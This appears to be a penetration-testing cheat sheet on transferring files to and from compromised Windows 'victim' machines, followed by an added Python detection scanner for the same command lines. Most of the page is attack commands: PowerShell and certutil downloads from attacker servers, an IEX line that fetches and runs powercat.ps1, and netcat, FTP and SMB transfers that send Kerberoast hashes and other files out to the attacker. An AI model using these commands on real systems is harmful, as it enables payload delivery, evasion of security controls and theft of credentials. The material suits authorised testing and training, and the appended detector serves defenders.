Windows

Uploading Files to Victims in Windows

1. PowerShell Download File

PowerShell provides a built-in method for downloading files directly from a remote web server.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"

Explanation: The attacking machine sets up a simple HTTP server using Python, and the victim machine downloads the file using PowerShell’s WebClient object.

2. Certutil

Certutil is a built-in Windows utility that can also be used to download files, which may bypass certain security mechanisms.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransfer

Explanation: The attacker runs a Python HTTP server, and the victim machine uses certutil to download the file.

3. PowerShell IWR (Invoke-WebRequest)

Invoke-WebRequest can be used in PowerShell to download files, similar to wget in Linux.

Attacking Machine Command:

python3 -m http.server 80

Victim Machine Command:

iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe

Explanation: The attacker sets up an HTTP server, and the victim uses PowerShell’s iwr command to download and save the file locally.

4. Netcat

Netcat can be used for transferring files to a victim machine by establishing a network connection.

Victim Machine Command:

nc.exe -lvp 4444 > FileToTransfer

Attacking Machine Command:

nc 10.10.10.2 4444 -w 3 < FileToTransfer

Explanation: The victim machine listens on port 4444 for incoming data, and the attacker sends the file over to it using nc.

5. FTP

FTP can be used to transfer files between systems. Here’s how to do it using a simple FTP server.

Attacking Machine Command:

twistd -n ftp -r .

Victim Machine Command:

ftp
open 10.10.10.1 2121
anonymous
get FileToTransfer
bye

Explanation: The attacker runs an FTP server using twistd, and the victim machine connects to it to download the file.

6. SMB

SMB is commonly used for file sharing in Windows environments. This command allows for transferring files over the SMB protocol.

Attacking Machine Command:

impacket-smbserver -smb2support test .

Victim Machine Command:

copy \\10.10.10.1\test\FileToTransfer FileToTransfer

Explanation: The attacker sets up an SMB server using impacket-smbserver, and the victim copies the file from the SMB share.


Downloading Files from Victims in Windows

1. Netcat

Netcat can be used to receive files from a victim machine by listening on a port.

Attacking Machine Command:

nc -lvp 4444 > hashes.kerberoast

Victim Machine Command:

nc.exe 10.10.10.1 4444 -w 3 < hashes.kerberoast

Explanation: The attacker listens on port 4444 for incoming data and receives it from the victim using nc.

2. FTP

FTP can also be used to upload files from the victim machine to the attacker’s machine.

Attacking Machine Command:

python -m pyftpdlib -w

Victim Machine Command:

ftp
open 10.10.10.1 2121
anonymous
put FileToDownload
bye

Explanation: The attacker runs an FTP server, and the victim machine uploads the file using FTP commands.

3. SMB

SMB is also useful for downloading files from the victim machine back to the attacker’s system.

Attacking Machine Command:

impacket-smbserver -smb2support test .

Victim Machine Command:

copy FiletoDownload \\10.10.10.1\test\FiletoDownload

Explanation: The attacker sets up an SMB server, and the victim machine copies the file to the SMB share.

4. PowerCat

PowerCat is a PowerShell-based tool used for networking. It can be used for file transfers in a similar manner to Netcat.

Victim Machine Command:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoDownload"

Attacking Machine Command:

wget http://10.10.10.2:4444/FiletoDownload

Explanation: The victim machine loads PowerCat and listens on port 4444 with the file as input, and the attacker connects to that port to retrieve the file.
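
Detection view of the commands above, as an added example that is not part of the original page: a small scanner that flags the victim-side command lines from both sections in process-creation logs. The rule names, the log layout and the sample records are assumptions constructed for illustration.

```python
import re

# Patterns keyed to the victim-side command lines on this page.
# Rule names are this example's own, not from any product.
RULES = {
    "webclient_download": re.compile(r"net\.webclient\)\.download(file|string)\(", re.I),
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\s.*-urlcache\b.*https?://", re.I),
    "iwr_outfile": re.compile(r"\b(iwr|invoke-webrequest)\s.*-outfile\b", re.I),
    # Shell redirection (< >) is not part of nc.exe's own command line,
    # so key on a listen flag or an "IP port" argument pair instead.
    "netcat_transfer": re.compile(
        r"\bnc(\.exe)?\s+(-\w*l\w*\b|\d{1,3}(\.\d{1,3}){3}\s+\d+)", re.I),
    "powercat_listener": re.compile(r"\bpowercat\s.*-l\b.*-i\b", re.I),
}

# Constructed process-creation records (not real telemetry).
# Assumed layout: "<time> <host> CommandLine=<command line>".
SAMPLE_LOG = r"""
2024-05-01T09:00:01Z WS01 CommandLine=powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"
2024-05-01T09:02:10Z WS01 CommandLine=certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransfer
2024-05-01T09:03:44Z WS02 CommandLine=certutil.exe -hashfile C:\Temp\setup.msi SHA256
2024-05-01T09:05:12Z WS02 CommandLine=powershell.exe iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe
2024-05-01T09:07:30Z WS03 CommandLine=nc.exe -lvp 4444
2024-05-01T09:08:02Z WS03 CommandLine=nc.exe 10.10.10.1 4444 -w 3
2024-05-01T09:10:55Z WS04 CommandLine=powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoDownload"
2024-05-01T09:12:00Z WS04 CommandLine=powershell.exe -c "Get-ChildItem C:\Users\test"
"""


def scan(log_text):
    """Return [(host, [rule names])] for each record that matches a rule."""
    hits = []
    for line in log_text.strip().splitlines():
        meta, _, cmd = line.partition(" CommandLine=")
        if not cmd:
            continue  # not a record in the assumed layout
        matched = [name for name, rx in RULES.items() if rx.search(cmd)]
        if matched:
            hits.append((meta.split()[1], matched))
    return hits


if __name__ == "__main__":
    for host, rules in scan(SAMPLE_LOG):
        print(host, ", ".join(rules))
```

The copy command is a cmd.exe built-in and the interactive ftp session takes its commands on standard input, so neither leaves these arguments in a process command line; the SMB and FTP transfers are better caught from network telemetry.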

